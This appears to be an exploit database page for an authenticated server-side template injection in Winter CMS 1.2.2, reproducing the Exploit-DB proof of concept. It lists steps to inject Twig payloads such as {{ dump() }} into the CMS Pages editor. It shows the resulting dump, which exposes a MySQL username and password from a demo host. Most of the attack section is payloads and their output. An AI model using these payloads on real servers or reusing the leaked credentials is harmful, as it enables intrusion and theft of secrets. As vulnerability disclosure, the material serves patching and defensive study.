Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)

vendor:

Winter CMS

by:

tmrswrr

8.1

CVSS

CRITICAL

Server-Side Template Injection (SSTI)

CWE

Product Name: Winter CMS

Affected Version From: 1.2.2002

Affected Version To: 1.2.2002

Patch Exists: NO

Related CWE:

CPE: a:wintercms:winter:1.2.2

Metasploit:

Other Scripts:

Platforms Tested: Tested on Windows and Linux

2023

Winter CMS 1.2.2 – Server-Side Template Injection (SSTI) (Authenticated)

The Winter CMS version 1.2.2 is vulnerable to Server-Side Template Injection (SSTI) when an authenticated user injects malicious payloads via the CMS Pages field. This allows an attacker to execute arbitrary code and potentially take control of the server.

Mitigation:

To mitigate this vulnerability, users should update to a patched version of Winter CMS and avoid inputting untrusted data into the CMS pages.

Source

Exploit-DB raw data:

# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
#Tested : https://www.softaculous.com/demos/WinterCMS


1 ) Login with admin cred and click CMS > Pages field > Plugin components > 
    https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview : 
    https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result : 
    49
 Payload :
    {{ dump() }}
 Result :
 
        "*::database" => array:4 [▼
          "default" => "mysql"
          "connections" => array:4 [▼
            "sqlite" => array:5 [▼
              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
              "driver" => "sqlite"
              "foreign_key_constraints" => true
              "prefix" => ""
              "url" => null
            ]
            "mysql" => array:15 [▼
              "charset" => "utf8mb4"
              "collation" => "utf8mb4_unicode_ci"
              "database" => "soft_pw3qsny"
              "driver" => "mysql"
              "engine" => "InnoDB"
              "host" => "localhost"
              "options" => []
              "password" => "8QSz9(pT)3"
              "port" => 3306
              "prefix" => ""
              "prefix_indexes" => true
              "strict" => true
              "unix_socket" => ""
              "url" => null
              "username" => "soft_pw3qsny"
            ]
            "pgsql" => array:12 [▶]
            "sqlsrv" => array:10 [▶]
          ]
          "migrations" => "migrations"
          "redis" => array:4 [▼
            "client" => "phpredis"
            "options" => array:2 [▼
              "cluster" => "redis"
              "prefix" => "winter_database_"
            ]
            "default" => array:5 [▼
              "database" => "0"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
            "cache" => array:5 [▼
              "database" => "1"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
          ]
        ]
      ]